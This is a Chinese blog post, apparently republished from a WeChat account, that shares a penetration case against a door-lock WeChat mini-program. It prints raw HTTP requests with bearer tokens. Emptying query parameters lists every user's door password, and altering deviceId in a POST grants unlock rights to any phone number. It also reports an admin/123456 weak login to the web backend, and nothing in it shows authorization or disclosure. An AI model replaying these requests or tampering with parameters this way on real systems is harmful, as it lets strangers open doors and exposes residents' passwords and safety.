01
原创说明
本篇文章为苏木师傅实战案例分享
02
渗透记录
微信小程序xxx,点击门卡-点击添加密码-截获数据包查看返回包可查看密码,可越权授权如何手机号开门权限
03
未授权一
删除userid和bind数值可查看全部用户密码
数据包:
GET/prod-api/nfc/device/list?userId=&isBind= HTTP/1.1Host:XXX.XXX.cnXweb_xhr:1Authorization:eyJhbGciOiJIUzUxMiJ9.eyJsb2dpbl91c2VyX2tleSI6ImUwMGY0YTY0LTNjZDctNDc1Zi1iN2NlLTc5ZDcwYWY3MjNjYyJ9.1LwhfaSNs34yL9mnACRLkviTL5NzbLCQwpv_jd0bjrsFcoFhMVsO7AD9C-K3jl83VA7RC5X_p53vCW4ZeWsqEQUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 MicroMessenger/7.0.20.1781(0x6700143B) NetType/WIFI MiniProgramEnv/Windows WindowsWechat/WMPF WindowsWechat(0x63090819) XWEB/8531Content-Type:application/jsonAccept:*/*Sec-Fetch-Site:cross-siteSec-Fetch-Mode:corsSec-Fetch-Dest:emptyReferer:https://servicewechat.com/wx473f7c96d0986720/37/page-frame.htmlAccept-Encoding:gzip, deflateAccept-Language:zh-CN,zh;q=0.9Connection:close
04
未授权二
可查看自己的密码
删除deviceid、ismin、status值后可查看所有用户密码
数据包:
GET/prod-api/fy/cardkey/list?deviceId=&isMain=&status= HTTP/1.1Host:XXX.XXX.cnXweb_xhr:1Authorization:eyJhbGciOiJIUzUxMiJ9.eyJsb2dpbl91c2VyX2tleSI6ImUwMGY0YTY0LTNjZDctNDc1Zi1iN2NlLTc5ZDcwYWY3MjNjYyJ9.1LwhfaSNs34yL9mnACRLkviTL5NzbLCQwpv_jd0bjrsFcoFhMVsO7AD9C-K3jl83VA7RC5X_p53vCW4ZeWsqEQUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 MicroMessenger/7.0.20.1781(0x6700143B) NetType/WIFI MiniProgramEnv/Windows WindowsWechat/WMPF WindowsWechat(0x63090819) XWEB/8531Content-Type:application/jsonAccept:*/*Sec-Fetch-Site:cross-siteSec-Fetch-Mode:corsSec-Fetch-Dest:emptyReferer:https://servicewechat.com/wx473f7c96d0986720/37/page-frame.htmlAccept-Encoding:gzip, deflateAccept-Language:zh-CN,zh;q=0.9Connection:close
05
未授权三
数据包:
POST /prod-api/fy/cardkey HTTP/1.1Host: xxx.xxx.cnContent-Length: 131Xweb_xhr: 1Authorization: eyJhbGciOiJIUzUxMiJ9.eyJsb2dpbl91c2VyX2tleSI6ImJiMDIxZjZmLTZmY2UtNDRmOS04M2FlLTBkZmMxZDEyZTZlNiJ9.ndIZOlqG9vXCvb2EBc5efx14tz3VtED_uRrFrCS-FhyBNY4MQTdu08ZVU6QfrrACGmuH_eZbr_uRfWBsEVXT6gUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 MicroMessenger/7.0.20.1781(0x6700143B) NetType/WIFI MiniProgramEnv/Windows WindowsWechat/WMPF WindowsWechat(0x63090819) XWEB/8531Content-Type: application/jsonAccept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://servicewechat.com/wx473f7c96d0986720/37/page-frame.htmlAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close{"deviceId":"758","passType":"4","password":"978949","endData":0,"phone":"18888888888","startTime":"2024-01-19 09:00","endTime":""}
通过修改deviceId值可在任何账号中为指定手机授权开锁权限
06
弱口令
小程序看完了,看看web,运气不错弱口令进去了是若依系统,但可惜的是里面没有历史漏洞
Url:https://XXX.XXX.cn/
账号:admin
密码:123456
如果你是一个长期主义者,欢迎加入我的知识星球,我们一起往前走,每日都会更新,精细化运营,微信识别二维码付费即可加入,如不满意,72 小时内可在 App 内无条件自助退款
往期回顾
文章来源: https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&mid=2247493356&idx=1&sn=713762a960605cfa851ac6016d4b1ffa&chksm=e8a5ec8fdfd26599f40863bea38e224e26d198c43c22a37955f024c6383956eb8f42c5342de9&scene=58&subscene=0#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh